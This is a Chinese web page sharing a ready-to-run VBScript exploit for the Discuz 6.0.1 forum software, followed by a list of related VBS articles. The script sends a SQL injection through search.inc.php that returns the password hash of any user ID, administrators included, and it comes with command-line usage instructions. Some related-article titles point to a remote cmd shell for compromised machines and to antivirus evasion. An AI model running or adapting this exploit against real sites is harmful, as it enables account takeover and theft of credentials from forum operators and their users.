discuz 任意管理員密碼漏洞利用工具 vbs代碼

更新時(shí)間：2009年07月20日 00:54:58 作者：

打算考慮寫個(gè)python版的，考慮大家的機(jī)器環(huán)境還是弄了個(gè)vbs版

也利于修改
以下是search.inc.php 文件漏洞利用代碼VBS版

 
Dim strUrl,strSite,strPath,strUid 
showB() 
Set Args = Wscript.Arguments 
If Args.Count <> 3 Then 
ShowU() 
Else 
strSite=Args(0) 
strPath=Args(1) 
strUid=Args(2) 
End If 
strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit" 
Set objXML = CreateObject("Microsoft.XMLHTTP") 
objXML.Open "POST",strSite & strPath & "index.php", False 
objXML.SetRequestHeader "Accept", "*/*" 
objXML.SetRequestHeader "Accept-Language", "zh-cn" 
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded" 
objXML.SetRequestHeader "User-Agent", "wap" 
objXML.send(strUrl) 
wscript.echo(objXML.ResponseText) 
Sub showB() 
With Wscript 
.Echo("+--------------------------=====================------------------------------+") 
.Echo("Exploit discuz6.0.1") 
.Echo("Code By Safe3") 
.Echo("+--------------------------=====================------------------------------+") 
End with 
End Sub 
Sub showU() 
With Wscript 
.Echo("+--------------------------=====================------------------------------+") 
.Echo("用法:") 
.Echo(" cscript "&.ScriptName&" site path uid") 
.Echo("例子:") 
.Echo(" cscript "&.ScriptName&" http://www.example.com/ /forum/ 1 >result.txt") 
.Echo("+--------------------------=====================------------------------------+") 
.Quit 
End with 
End Sub 

獲得的密碼大家自己在result.txt中查找

相關(guān)文章

VBS教程：VBScript 基礎(chǔ)-VBScript 運(yùn)算符
VBS教程：VBScript 基礎(chǔ)-VBScript 運(yùn)算符...
2006-11-11
VBS教程：正則表達(dá)式簡介 -優(yōu)先權(quán)順序
VBS教程：正則表達(dá)式簡介 -優(yōu)先權(quán)順序...
2006-11-11
VBS調(diào)用WMI實(shí)現(xiàn)搜索硬盤mp3文件
如果你想用遞歸搜索我也沒辦法。下面的程序搜索電腦上所有的MP3文件。
2011-01-01
VBS基礎(chǔ)篇 Err對(duì)象
vbscript中Err對(duì)象是一個(gè)具有全局范圍的內(nèi)部對(duì)象，含有關(guān)于錯(cuò)誤的所有信息,需要的朋友可以參考下
2018-05-05
自動(dòng)刪除超過10天的文件及文件夾的vbs代碼
自動(dòng)刪除超過10天的文件及文件夾vbs，主要是針對(duì)一些沒有用的文件夾。
2009-11-11
殺毒的對(duì)vbs相當(dāng)敏感免殺
殺毒的對(duì)vbs相當(dāng)敏感免殺...
2006-08-08
抖音很火的vbs表白代碼(簡單實(shí)用!)
這篇文章主要給大家介紹了關(guān)于抖音很火的vbs表白代碼的相關(guān)資料,教你用vbs表白女朋友,包含多個(gè)彈窗絕對(duì)實(shí)在,保管實(shí)用,內(nèi)容可以自己修改,需要的朋友可以參考下
2022-04-04
VBS字符串的內(nèi)部實(shí)現(xiàn)
最近對(duì) VBS 字符串 Chr(0) 注①截?cái)嘤懻摰帽容^多，看來有必要介紹一下 VBS 字符串的內(nèi)部實(shí)現(xiàn)。
2012-01-01
VBScript 打造自己的遠(yuǎn)程CMDShell附使用教程
這個(gè)cmdshell需要結(jié)合nc進(jìn)行配合使用，現(xiàn)在肉雞上執(zhí)行cmdshell然后在本地上面運(yùn)行nc，注意看下面的參數(shù)
2013-07-07
VBS教程：屬性-DateCreated 屬性
VBS教程：屬性-DateCreated 屬性...
2006-11-11